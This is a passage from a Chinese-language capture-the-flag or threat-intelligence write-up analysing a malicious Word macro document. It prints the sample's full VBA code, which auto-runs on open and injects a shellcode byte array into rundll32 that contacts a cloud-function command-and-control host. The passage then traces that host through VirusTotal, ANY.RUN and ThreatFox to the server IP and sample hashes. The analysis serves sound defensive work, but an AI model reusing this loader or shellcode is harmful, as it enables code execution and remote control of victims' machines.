class="string">&quot;CreateRemoteThread&quot;</span> (<span class="keyword">ByVal</span> hProcess <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lpThreadAttributes <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> dwStackSize <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lpStartAddress <span class="keyword">As</span> <span class="type">Long</span>, lpParameter <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> dwCreationFlags <span class="keyword">As</span> <span class="type">Long</span>, lpThreadID <span class="keyword">As</span> <span class="type">Long</span>) <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    <span class="keyword">Private</span> <span class="keyword">Declare</span> <span class="keyword">Function</span> AllocStuff <span class="keyword">Lib</span> <span class="string">&quot;kernel32&quot;</span> <span class="keyword">Alias</span> <span class="string">&quot;VirtualAllocEx&quot;</span> (<span class="keyword">ByVal</span> hProcess <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lpAddr <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lSize <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> flAllocationType <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> flProtect <span class="keyword">As</span> <span class="type">Long</span>) <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    <span class="keyword">Private</span> <span class="keyword">Declare</span> <span class="keyword">Function</span> WriteStuff <span class="keyword">Lib</span> <span class="string">&quot;kernel32&quot;</span> <span class="keyword">Alias</span> <span class="string">&quot;WriteProcessMemory&quot;</span> (<span class="keyword">ByVal</span> hProcess <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lDest <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByRef</span> Source <span class="keyword">As</span> Any, <span class="keyword">ByVal</span> Length <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> LengthWrote <span class="keyword">As</span> <span class="type">Long</span>) <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    <span class="keyword">Private</span> <span class="keyword">Declare</span> <span class="keyword">Function</span> RunStuff <span class="keyword">Lib</span> <span class="string">&quot;kernel32&quot;</span> <span class="keyword">Alias</span> <span class="string">&quot;CreateProcessA&quot;</span> (<span class="keyword">ByVal</span> lpApplicationName <span class="keyword">As</span> <span class="type">String</span>, <span class="keyword">ByVal</span> lpCommandLine <span class="keyword">As</span> <span class="type">String</span>, lpProcessAttributes <span class="keyword">As</span> Any, lpThreadAttributes <span class="keyword">As</span> Any, <span class="keyword">ByVal</span> bInheritHandles <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> dwCreationFlags <span class="keyword">As</span> <span class="type">Long</span>, lpEnvironment <span class="keyword">As</span> Any, <span class="keyword">ByVal</span> lpCurrentDriectory <span class="keyword">As</span> <span class="type">String</span>, lpStartupInfo <span class="keyword">As</span> STARTUPINFO, lpProcessInformation <span class="keyword">As</span> PROCESS_INFORMATION) <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">End</span> <span class="meta-keyword">If</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">Sub</span> Auto_Open()</span><br><span class="line">    Dim myByte As Long, myArray As Variant, offset As Long</span><br><span class="line">    <span class="keyword">Dim</span> pInfo <span class="keyword">As</span> PROCESS_INFORMATION</span><br><span class="line">    <span class="keyword">Dim</span> sInfo <span class="keyword">As</span> STARTUPINFO</span><br><span class="line">    <span class="keyword">Dim</span> sNull <span class="keyword">As</span> <span class="type">String</span></span><br><span class="line">    <span class="keyword">Dim</span> sProc <span class="keyword">As</span> <span class="type">String</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">If</span> VBA7 <span class="meta-keyword">Then</span></span></span><br><span class="line">    <span class="keyword">Dim</span> rwxpage <span class="keyword">As</span> LongPtr, res <span class="keyword">As</span> LongPtr</span><br><span class="line"><span class="meta">#<span class="meta-keyword">Else</span></span></span><br><span class="line">    <span class="keyword">Dim</span> rwxpage <span class="keyword">As</span> <span class="type">Long</span>, res <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">End</span> <span class="meta-keyword">If</span></span></span><br><span class="line">    myArray = Array(-<span class="number">4</span>, -<span class="number">24</span>, -<span class="number">119</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">96</span>, -<span class="number">119</span>, -<span class="number">27</span>, <span class="number">49</span>, -<span class="number">46</span>, <span class="number">100</span>, -<span class="number">117</span>, <span class="number">82</span>, <span class="number">48</span>, -<span class="number">117</span>, <span class="number">82</span>, <span class="number">12</span>, -<span class="number">117</span>, <span class="number">82</span>, <span class="number">20</span>, -<span class="number">117</span>, <span class="number">114</span>, <span class="number">40</span>, <span class="number">15</span>, -<span class="number">73</span>, <span class="number">74</span>, <span class="number">38</span>, <span class="number">49</span>, -<span class="number">1</span>, <span class="number">49</span>, -<span class="number">64</span>, -<span class="number">84</span>, <span class="number">60</span>, <span class="number">97</span>, <span class="number">124</span>, <span class="number">2</span>, <span class="number">44</span>, <span class="number">32</span>, -<span class="number">63</span>, -<span class="number">49</span>, _</span><br><span class="line"><span class="number">13</span>, <span class="number">1</span>, -<span class="number">57</span>, -<span class="number">30</span>, -<span class="number">16</span>, <span class="number">82</span>, <span class="number">87</span>, -<span class="number">117</span>, <span class="number">82</span>, <span class="number">16</span>, -<span class="number">117</span>, <span class="number">66</span>, <span class="number">60</span>, <span class="number">1</span>, -<span class="number">48</span>, -<span class="number">117</span>, <span class="number">64</span>, <span class="number">120</span>, -<span class="number">123</span>, -<span class="number">64</span>, <span class="number">116</span>, <span class="number">74</span>, <span class="number">1</span>, -<span class="number">48</span>, <span class="number">80</span>, -<span class="number">117</span>, <span class="number">72</span>, <span class="number">24</span>, -<span class="number">117</span>, <span class="number">88</span>, <span class="number">32</span>, <span class="number">1</span>, -<span class="number">45</span>, -<span class="number">29</span>, <span class="number">60</span>, <span class="number">73</span>, -<span class="number">117</span>, <span class="number">52</span>, -<span class="number">117</span>, <span class="number">1</span>, _</span><br><span class="line">-<span class="number">42</span>, <span class="number">49</span>, -<span class="number">1</span>, <span class="number">49</span>, -<span class="number">64</span>, -<span class="number">84</span>, -<span class="number">63</span>, -<span class="number">49</span>, <span class="number">13</span>, <span class="number">1</span>, -<span class="number">57</span>, <span class="number">56</span>, -<span class="number">32</span>, <span class="number">117</span>, -<span class="number">12</span>, <span class="number">3</span>, <span class="number">125</span>, -<span class="number">8</span>, <span class="number">59</span>, <span class="number">125</span>, <span class="number">36</span>, <span class="number">117</span>, -<span class="number">30</span>, <span class="number">88</span>, -<span class="number">117</span>, <span class="number">88</span>, <span class="number">36</span>, <span class="number">1</span>, -<span class="number">45</span>, <span class="number">102</span>, -<span class="number">117</span>, <span class="number">12</span>, <span class="number">75</span>, -<span class="number">117</span>, <span class="number">88</span>, <span class="number">28</span>, <span class="number">1</span>, -<span class="number">45</span>, -<span class="number">117</span>, <span class="number">4</span>, _</span><br><span class="line">-<span class="number">117</span>, <span class="number">1</span>, -<span class="number">48</span>, -<span class="number">119</span>, <span class="number">68</span>, <span class="number">36</span>, <span class="number">36</span>, <span class="number">91</span>, <span class="number">91</span>, <span class="number">97</span>, <span class="number">89</span>, <span class="number">90</span>, <span class="number">81</span>, -<span class="number">1</span>, -<span class="number">32</span>, <span class="number">88</span>, <span class="number">95</span>, <span class="number">90</span>, -<span class="number">117</span>, <span class="number">18</span>, -<span class="number">21</span>, -<span class="number">122</span>, <span class="number">93</span>, <span class="number">104</span>, <span class="number">110</span>, <span class="number">101</span>, <span class="number">116</span>, <span class="number">0</span>, <span class="number">104</span>, <span class="number">119</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">84</span>, <span class="number">104</span>, <span class="number">76</span>, <span class="number">119</span>, <span class="number">38</span>, <span class="number">7</span>, -<span class="number">1</span>, _</span><br><span class="line">-<span class="number">43</span>, <span class="number">49</span>, -<span class="number">1</span>, <span class="number">87</span>, <span class="number">87</span>, <span class="number">87</span>, <span class="number">87</span>, <span class="number">87</span>, <span class="number">104</span>, <span class="number">58</span>, <span class="number">86</span>, <span class="number">121</span>, -<span class="number">89</span>, -<span class="number">1</span>, -<span class="number">43</span>, -<span class="number">23</span>, -<span class="number">124</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">91</span>, <span class="number">49</span>, -<span class="number">55</span>, <span class="number">81</span>, <span class="number">81</span>, <span class="number">106</span>, <span class="number">3</span>, <span class="number">81</span>, <span class="number">81</span>, <span class="number">104</span>, <span class="number">80</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">83</span>, <span class="number">80</span>, <span class="number">104</span>, <span class="number">87</span>, -<span class="number">119</span>, -<span class="number">97</span>, _</span><br><span class="line">-<span class="number">58</span>, -<span class="number">1</span>, -<span class="number">43</span>, -<span class="number">21</span>, <span class="number">112</span>, <span class="number">91</span>, <span class="number">49</span>, -<span class="number">46</span>, <span class="number">82</span>, <span class="number">104</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">64</span>, -<span class="number">124</span>, <span class="number">82</span>, <span class="number">82</span>, <span class="number">82</span>, <span class="number">83</span>, <span class="number">82</span>, <span class="number">80</span>, <span class="number">104</span>, -<span class="number">21</span>, <span class="number">85</span>, <span class="number">46</span>, <span class="number">59</span>, -<span class="number">1</span>, -<span class="number">43</span>, -<span class="number">119</span>, -<span class="number">58</span>, -<span class="number">125</span>, -<span class="number">61</span>, <span class="number">80</span>, <span class="number">49</span>, -<span class="number">1</span>, <span class="number">87</span>, <span class="number">87</span>, <span class="number">106</span>, -<span class="number">1</span>, <span class="number">83</span>, <span class="number">86</span>, _</span><br><span class="line"><span class="number">104</span>, <span class="number">45</span>, <span class="number">6</span>, <span class="number">24</span>, <span class="number">123</span>, -<span class="number">1</span>, -<span class="number">43</span>, -<span class="number">123</span>, -<span class="number">64</span>, <span class="number">15</span>, -<span class="number">124</span>, -<span class="number">61</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">49</span>, -<span class="number">1</span>, -<span class="number">123</span>, -<span class="number">10</span>, <span class="number">116</span>, <span class="number">4</span>, -<span class="number">119</span>, -<span class="number">7</span>, -<span class="number">21</span>, <span class="number">9</span>, <span class="number">104</span>, -<span class="number">86</span>, -<span class="number">59</span>, -<span class="number">30</span>, <span class="number">93</span>, -<span class="number">1</span>, -<span class="number">43</span>, -<span class="number">119</span>, -<span class="number">63</span>, <span class="number">104</span>, <span class="number">69</span>, <span class="number">33</span>, <span class="number">94</span>, <span class="number">49</span>, -<span class="number">1</span>, _</span><br><span class="line">-<span class="number">43</span>, <span class="number">49</span>, -<span class="number">1</span>, <span class="number">87</span>, <span class="number">106</span>, <span class="number">7</span>, <span class="number">81</span>, <span class="number">86</span>, <span class="number">80</span>, <span class="number">104</span>, -<span class="number">73</span>, <span class="number">87</span>, -<span class="number">32</span>, <span class="number">11</span>, -<span class="number">1</span>, -<span class="number">43</span>, -<span class="number">65</span>, <span class="number">0</span>, <span class="number">47</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">57</span>, -<span class="number">57</span>, <span class="number">116</span>, -<span class="number">73</span>, <span class="number">49</span>, -<span class="number">1</span>, -<span class="number">23</span>, -<span class="number">111</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, -<span class="number">23</span>, -<span class="number">55</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, -<span class="number">24</span>, -<span class="number">117</span>, -<span class="number">1</span>, _</span><br><span class="line">-<span class="number">1</span>, -<span class="number">1</span>, <span class="number">47</span>, <span class="number">118</span>, <span class="number">117</span>, <span class="number">101</span>, <span class="number">46</span>, <span class="number">109</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">46</span>, <span class="number">106</span>, <span class="number">115</span>, <span class="number">0</span>, <span class="number">32</span>, -<span class="number">92</span>, <span class="number">15</span>, <span class="number">47</span>, <span class="number">7</span>, -<span class="number">86</span>, -<span class="number">96</span>, -<span class="number">85</span>, -<span class="number">104</span>, -<span class="number">78</span>, <span class="number">103</span>, -<span class="number">107</span>, -<span class="number">127</span>, -<span class="number">113</span>, <span class="number">32</span>, <span class="number">125</span>, <span class="number">78</span>, -<span class="number">13</span>, <span class="number">91</span>, -<span class="number">97</span>, -<span class="number">24</span>, -<span class="number">116</span>, <span class="number">63</span>, <span class="number">56</span>, -<span class="number">109</span>, <span class="number">52</span>, _</span><br><span class="line">-<span class="number">74</span>, <span class="number">64</span>, <span class="number">65</span>, -<span class="number">55</span>, -<span class="number">73</span>, <span class="number">49</span>, -<span class="number">43</span>, -<span class="number">24</span>, -<span class="number">99</span>, -<span class="number">47</span>, -<span class="number">104</span>, <span class="number">11</span>, <span class="number">12</span>, -<span class="number">45</span>, <span class="number">79</span>, <span class="number">17</span>, <span class="number">35</span>, <span class="number">42</span>, -<span class="number">127</span>, -<span class="number">109</span>, -<span class="number">8</span>, -<span class="number">121</span>, -<span class="number">10</span>, <span class="number">121</span>, -<span class="number">47</span>, -<span class="number">50</span>, <span class="number">104</span>, <span class="number">98</span>, <span class="number">59</span>, -<span class="number">45</span>, -<span class="number">81</span>, -<span class="number">84</span>, -<span class="number">10</span>, <span class="number">107</span>, <span class="number">103</span>, -<span class="number">17</span>, <span class="number">67</span>, -<span class="number">4</span>, -<span class="number">6</span>, <span class="number">97</span>, _</span><br><span class="line"><span class="number">47</span>, <span class="number">0</span>, <span class="number">85</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">45</span>, <span class="number">65</span>, <span class="number">103</span>, <span class="number">101</span>, <span class="number">110</span>, <span class="number">116</span>, <span class="number">58</span>, <span class="number">32</span>, <span class="number">77</span>, <span class="number">111</span>, <span class="number">122</span>, <span class="number">105</span>, <span class="number">108</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">53</span>, <span class="number">46</span>, <span class="number">48</span>, <span class="number">32</span>, <span class="number">40</span>, <span class="number">77</span>, <span class="number">97</span>, <span class="number">99</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">116</span>, <span class="number">111</span>, <span class="number">115</span>, <span class="number">104</span>, <span class="number">59</span>, <span class="number">32</span>, <span class="number">73</span>, <span class="number">110</span>, _</span><br><span class="line"><span class="number">116</span>, <span class="number">101</span>, <span class="number">108</span>, <span class="number">32</span>, <span class="number">77</span>, <span class="number">97</span>, <span class="number">99</span>, <span class="number">32</span>, <span class="number">79</span>, <span class="number">83</span>, <span class="number">32</span>, <span class="number">88</span>, <span class="number">32</span>, <span class="number">49</span>, <span class="number">48</span>, <span class="number">46</span>, <span class="number">49</span>, <span class="number">53</span>, <span class="number">59</span>, <span class="number">32</span>, <span class="number">114</span>, <span class="number">118</span>, <span class="number">58</span>, <span class="number">56</span>, <span class="number">48</span>, <span class="number">46</span>, <span class="number">48</span>, <span class="number">41</span>, <span class="number">32</span>, <span class="number">71</span>, <span class="number">101</span>, <span class="number">99</span>, <span class="number">107</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">50</span>, <span class="number">48</span>, <span class="number">49</span>, <span class="number">48</span>, <span class="number">48</span>, _</span><br><span class="line"><span class="number">49</span>, <span class="number">48</span>, <span class="number">49</span>, <span class="number">32</span>, <span class="number">70</span>, <span class="number">105</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">102</span>, <span class="number">111</span>, <span class="number">120</span>, <span class="number">47</span>, <span class="number">56</span>, <span class="number">48</span>, <span class="number">46</span>, <span class="number">48</span>, <span class="number">13</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">85</span>, <span class="number">119</span>, -<span class="number">3</span>, -<span class="number">8</span>, -<span class="number">107</span>, <span class="number">40</span>, -<span class="number">123</span>, -<span class="number">125</span>, -<span class="number">4</span>, -<span class="number">119</span>, -<span class="number">39</span>, <span class="number">94</span>, <span class="number">117</span>, -<span class="number">84</span>, -<span class="number">37</span>, -<span class="number">67</span>, -<span class="number">88</span>, -<span class="number">119</span>, <span class="number">45</span>, -<span class="number">56</span>, -<span class="number">85</span>, _</span><br><span class="line"><span class="number">25</span>, -<span class="number">83</span>, -<span class="number">27</span>, -<span class="number">32</span>, <span class="number">97</span>, -<span class="number">31</span>, -<span class="number">100</span>, <span class="number">57</span>, <span class="number">90</span>, -<span class="number">66</span>, -<span class="number">22</span>, <span class="number">23</span>, -<span class="number">59</span>, -<span class="number">108</span>, -<span class="number">66</span>, -<span class="number">89</span>, <span class="number">110</span>, -<span class="number">55</span>, <span class="number">86</span>, -<span class="number">91</span>, -<span class="number">4</span>, <span class="number">115</span>, <span class="number">34</span>, <span class="number">71</span>, -<span class="number">47</span>, <span class="number">72</span>, <span class="number">49</span>, <span class="number">20</span>, <span class="number">99</span>, -<span class="number">119</span>, <span class="number">85</span>, <span class="number">14</span>, -<span class="number">14</span>, <span class="number">71</span>, <span class="number">52</span>, -<span class="number">73</span>, -<span class="number">78</span>, <span class="number">64</span>, -<span class="number">122</span>, <span class="number">20</span>, _</span><br><span class="line">-<span class="number">117</span>, <span class="number">59</span>, -<span class="number">88</span>, -<span class="number">19</span>, <span class="number">19</span>, -<span class="number">76</span>, -<span class="number">12</span>, <span class="number">25</span>, -<span class="number">29</span>, <span class="number">28</span>, -<span class="number">37</span>, <span class="number">87</span>, <span class="number">20</span>, -<span class="number">22</span>, -<span class="number">82</span>, -<span class="number">14</span>, -<span class="number">24</span>, -<span class="number">10</span>, -<span class="number">5</span>, -<span class="number">115</span>, -<span class="number">72</span>, <span class="number">58</span>, -<span class="number">33</span>, <span class="number">109</span>, <span class="number">0</span>, -<span class="number">100</span>, -<span class="number">87</span>, <span class="number">108</span>, -<span class="number">62</span>, <span class="number">123</span>, <span class="number">31</span>, <span class="number">32</span>, -<span class="number">94</span>, <span class="number">49</span>, -<span class="number">119</span>, <span class="number">83</span>, -<span class="number">92</span>, -<span class="number">25</span>, <span class="number">71</span>, <span class="number">52</span>, _</span><br><span class="line">-<span class="number">100</span>, -<span class="number">39</span>, <span class="number">121</span>, <span class="number">28</span>, <span class="number">110</span>, <span class="number">5</span>, -<span class="number">8</span>, <span class="number">31</span>, -<span class="number">86</span>, -<span class="number">51</span>, <span class="number">111</span>, <span class="number">74</span>, <span class="number">91</span>, <span class="number">96</span>, -<span class="number">100</span>, -<span class="number">15</span>, -<span class="number">34</span>, <span class="number">90</span>, <span class="number">110</span>, <span class="number">43</span>, -<span class="number">106</span>, <span class="number">54</span>, <span class="number">69</span>, -<span class="number">89</span>, <span class="number">46</span>, <span class="number">121</span>, -<span class="number">39</span>, -<span class="number">16</span>, -<span class="number">92</span>, <span class="number">76</span>, -<span class="number">68</span>, <span class="number">13</span>, -<span class="number">42</span>, -<span class="number">86</span>, <span class="number">7</span>, <span class="number">45</span>, <span class="number">96</span>, -<span class="number">72</span>, <span class="number">66</span>, -<span class="number">51</span>, _</span><br><span class="line">-<span class="number">119</span>, <span class="number">82</span>, -<span class="number">103</span>, -<span class="number">112</span>, -<span class="number">58</span>, <span class="number">62</span>, -<span class="number">37</span>, -<span class="number">106</span>, <span class="number">109</span>, -<span class="number">45</span>, <span class="number">7</span>, <span class="number">90</span>, -<span class="number">18</span>, <span class="number">80</span>, <span class="number">20</span>, <span class="number">81</span>, <span class="number">31</span>, -<span class="number">128</span>, <span class="number">47</span>, <span class="number">22</span>, -<span class="number">45</span>, -<span class="number">96</span>, <span class="number">0</span>, -<span class="number">125</span>, <span class="number">10</span>, <span class="number">120</span>, <span class="number">110</span>, <span class="number">71</span>, -<span class="number">76</span>, <span class="number">109</span>, -<span class="number">40</span>, -<span class="number">103</span>, -<span class="number">96</span>, <span class="number">69</span>, -<span class="number">126</span>, -<span class="number">76</span>, -<span class="number">76</span>, -<span class="number">112</span>, -<span class="number">87</span>, -<span class="number">86</span>, _</span><br><span class="line">-<span class="number">89</span>, <span class="number">100</span>, -<span class="number">50</span>, <span class="number">20</span>, <span class="number">124</span>, -<span class="number">36</span>, <span class="number">52</span>, <span class="number">118</span>, -<span class="number">2</span>, <span class="number">44</span>, <span class="number">57</span>, -<span class="number">124</span>, <span class="number">25</span>, -<span class="number">64</span>, -<span class="number">40</span>, <span class="number">2</span>, -<span class="number">110</span>, <span class="number">15</span>, -<span class="number">2</span>, <span class="number">28</span>, <span class="number">94</span>, <span class="number">125</span>, -<span class="number">108</span>, <span class="number">117</span>, -<span class="number">54</span>, <span class="number">0</span>, <span class="number">104</span>, -<span class="number">16</span>, -<span class="number">75</span>, -<span class="number">94</span>, <span class="number">86</span>, -<span class="number">1</span>, -<span class="number">43</span>, <span class="number">106</span>, <span class="number">64</span>, <span class="number">104</span>, <span class="number">0</span>, <span class="number">16</span>, <span class="number">0</span>, <span class="number">0</span>, _</span><br><span class="line"><span class="number">104</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">64</span>, <span class="number">0</span>, <span class="number">87</span>, <span class="number">104</span>, <span class="number">88</span>, -<span class="number">92</span>, <span class="number">83</span>, -<span class="number">27</span>, -<span class="number">1</span>, -<span class="number">43</span>, -<span class="number">109</span>, -<span class="number">71</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, -<span class="number">39</span>, <span class="number">81</span>, <span class="number">83</span>, -<span class="number">119</span>, -<span class="number">25</span>, <span class="number">87</span>, <span class="number">104</span>, <span class="number">0</span>, <span class="number">32</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">83</span>, <span class="number">86</span>, <span class="number">104</span>, <span class="number">18</span>, -<span class="number">106</span>, -<span class="number">119</span>, -<span class="number">30</span>, -<span class="number">1</span>, -<span class="number">43</span>, _</span><br><span class="line">-<span class="number">123</span>, -<span class="number">64</span>, <span class="number">116</span>, -<span class="number">58</span>, -<span class="number">117</span>, <span class="number">7</span>, <span class="number">1</span>, -<span class="number">61</span>, -<span class="number">123</span>, -<span class="number">64</span>, <span class="number">117</span>, -<span class="number">27</span>, <span class="number">88</span>, -<span class="number">61</span>, -<span class="number">24</span>, -<span class="number">87</span>, -<span class="number">3</span>, -<span class="number">1</span>, -<span class="number">1</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">118</span>, <span class="number">105</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">45</span>, <span class="number">112</span>, <span class="number">115</span>, <span class="number">49</span>, <span class="number">54</span>, <span class="number">119</span>, <span class="number">104</span>, <span class="number">118</span>, <span class="number">116</span>, <span class="number">45</span>, <span class="number">49</span>, <span class="number">51</span>, <span class="number">48</span>, <span class="number">52</span>, _</span><br><span class="line"><span class="number">56</span>, <span class="number">48</span>, <span class="number">48</span>, <span class="number">50</span>, <span class="number">55</span>, <span class="number">49</span>, <span class="number">46</span>, <span class="number">115</span>, <span class="number">104</span>, <span class="number">46</span>, <span class="number">116</span>, <span class="number">101</span>, <span class="number">110</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">110</span>, <span class="number">116</span>, <span class="number">97</span>, <span class="number">112</span>, <span class="number">105</span>, <span class="number">103</span>, <span class="number">119</span>, <span class="number">46</span>, <span class="number">99</span>, <span class="number">111</span>, <span class="number">109</span>, <span class="number">0</span>, <span class="number">73</span>, -<span class="number">106</span>, <span class="number">2</span>, -<span class="number">46</span>)</span><br><span class="line">    <span class="keyword">If</span> Len(Environ(<span class="string">&quot;ProgramW6432&quot;</span>)) &gt; <span class="number">0</span> <span class="keyword">Then</span></span><br><span class="line">        sProc = Environ(<span class="string">&quot;windir&quot;</span>) &amp; <span class="string">&quot;\\SysWOW64\\rundll32.exe&quot;</span></span><br><span class="line">    <span class="keyword">Else</span></span><br><span class="line">        sProc = Environ(<span class="string">&quot;windir&quot;</span>) &amp; <span class="string">&quot;\\System32\\rundll32.exe&quot;</span></span><br><span class="line">    <span class="keyword">End</span> <span class="keyword">If</span></span><br><span class="line"></span><br><span class="line">    res = RunStuff(sNull, sProc, <span class="keyword">ByVal</span> <span class="number">0&amp;</span>, <span class="keyword">ByVal</span> <span class="number">0&amp;</span>, <span class="keyword">ByVal</span> <span class="number">1&amp;</span>, <span class="keyword">ByVal</span> <span class="number">4&amp;</span>, <span class="keyword">ByVal</span> <span class="number">0&amp;</span>, sNull, sInfo, pInfo)</span><br><span class="line"></span><br><span class="line">    rwxpage = AllocStuff(pInfo.hProcess, <span class="number">0</span>, UBound(myArray), <span class="number">&amp;H1000</span>, <span class="number">&amp;H40</span>)</span><br><span class="line">    <span class="keyword">For</span> offset = LBound(myArray) <span class="keyword">To</span> UBound(myArray)</span><br><span class="line">        myByte = myArray(offset)</span><br><span class="line">        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, <span class="number">1</span>, <span class="keyword">ByVal</span> <span class="number">0&amp;</span>)</span><br><span class="line">    <span class="keyword">Next</span> offset</span><br><span class="line">    res = CreateStuff(pInfo.hProcess, <span class="number">0</span>, <span class="number">0</span>, rwxpage, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line"><span class="keyword">End</span> <span class="keyword">Sub</span></span><br><span class="line"><span class="keyword">Sub</span> AutoOpen()</span><br><span class="line">    Auto_Open</span><br><span class="line"><span class="keyword">End</span> <span class="keyword">Sub</span></span><br><span class="line"><span class="keyword">Sub</span> Workbook_Open()</span><br><span class="line">    Auto_Open</span><br><span class="line"><span class="keyword">End</span> <span class="keyword">Sub</span></span><br></pre></td></tr></table></figure>

<p>明显的，myArray变量存的数组应该是一个dll，用rundll32.exe加载并执行，可惜在还原dll的时候并没有正确还原，所以解这道题的大部分路目前为止都被堵上了。</p>
<h3 id="VirusTotal"><a href="#VirusTotal" class="headerlink" title="VirusTotal"></a>VirusTotal</h3><p>在上传微步无果后，将样本上传至VT，期待VT沙箱的behavior解析结果</p>
<p><img src="http://cdn.polowong.top/image-20240401172303794.png" alt="image-20240401172303794"></p>
<p>在Behavior中，可以看到类似微步沙箱的结果，即网络连接、文件释放情况等。</p>
<p>可惜的是，在赛时并未解析出现有的URL地址，VT沙箱的解析时间非常久，在赛时所看到的内容如下：</p>
<p><img src="http://cdn.polowong.top/image-20240401172422571.png" alt="image-20240401172422571"></p>
<p>在VT的relations中，可以看到与样本所关联的信息，主要为域名、IP地址等。</p>
<p><img src="http://cdn.polowong.top/image-20240401172603439.png" alt="image-20240401172603439"></p>
<p>在赛时能看到的只有第一条记录<strong><a target="_blank" rel="noopener" href="http://service-ps16whvt-1304800271.sh.tencentapigw.com/">http://service-ps16whvt-1304800271.sh.tencentapigw.com</a></strong>，无法确认上图中URL即为回连地址。</p>
<h3 id="ANY-RUN"><a href="#ANY-RUN" class="headerlink" title="ANY.RUN"></a>ANY.RUN</h3><p>在上述两个在线沙箱平台检测无果后，将.docm样本上传至any.run，使用默认配置win7x32bit进行检测。</p>
<p>在该平台正确的检测到了样本的下载与回连动作，如下图所示：</p>
<p><img src="http://cdn.polowong.top/image-20240401172925216.png" alt="image-20240401172925216"></p>
<p>那么至此可以确定，在VT中出现的<a target="_blank" rel="noopener" href="http://service-ps16whvt-1304800271.sh.tencentapigw.com即为回连地址,使用腾讯云的云函数隐藏了真正的c2地址./">http://service-ps16whvt-1304800271.sh.tencentapigw.com即为回连地址，使用腾讯云的云函数隐藏了真正的C2地址。</a></p>
<h2 id="Q1-定位C2-Server"><a href="#Q1-定位C2-Server" class="headerlink" title="Q1:定位C2 Server"></a>Q1:定位C2 Server</h2><p>目前得到的IoC有 </p>
<p>C2回连域名<strong><a target="_blank" rel="noopener" href="http://service-ps16whvt-1304800271.sh.tencentapigw.com/">http://service-ps16whvt-1304800271.sh.tencentapigw.com</a></strong></p>
<p>.docm样本hash值<strong>6ef475fdbe8052fe850923275247e5dafa08be83015bad755ccc421ae2ea73e8</strong></p>
<p>直接搜索回连域名，在ThreatFox有相关记录：</p>
<p><img src="http://cdn.polowong.top/image-20240401173328728.png" alt="image-20240401173328728"></p>
<p>详情中记录了社区用户解析并提交的C2 Server信息:</p>
<p><img src="http://cdn.polowong.top/image-20240401173404587.png" alt="image-20240401173404587"></p>
<p>所以对于Q1，答案为<strong>122.51.7.163</strong></p>
<h2 id="Q2-确定样本MD5"><a href="#Q2-确定样本MD5" class="headerlink" title="Q2:确定样本MD5"></a>Q2:确定样本MD5</h2><p>根据IoC <strong>service-ps16whvt-1304800271.sh.tencentapigw.com</strong>在VT Relation中得到样本信息：</p>
<p><img src="http://cdn.polowong.top/image-20240401190837811.png" alt="image-20240401190837811"></p>
<p>选中对应的样本 todesk.exe，点击DETAILS,查看样本MD5值。</p>
<p><img src="http://cdn.polowong.top/image-20240401191040627.png" alt="image-20240401191040627"></p>
<p>所以样本MD5为<strong>a831de33265fe368d7c2a6892857a232</strong></p>
<p>样本的首次提交时间为北京时间3.29号11.32分左右，所以这证明了该样本的首次上传并非赛时其他选手所为。</p>
<p><img src="http://cdn.polowong.top/image-20240401191208208.png" alt="image-20240401191208208"></p>
<p><img src="http://cdn.polowong.top/image-20240401191318090.png" alt="image-20240401191318090"></p>
<h2 id="赛后思考"><a href="#赛后思考" class="headerlink" title="赛后思考"></a>赛后思考</h2><h3 id="威胁情报部分"><a href="#威胁情报部分" class="headerlink" title="威胁情报部分"></a>威胁情报部分</h3><p>赛后重新在微步沙箱分析了XXX.docm文件，发现可以获取到云函数地址：</p>
<p><img src="http://cdn.polowong.top/image-20240401191502258.png" alt="image-20240401191502258"></p>
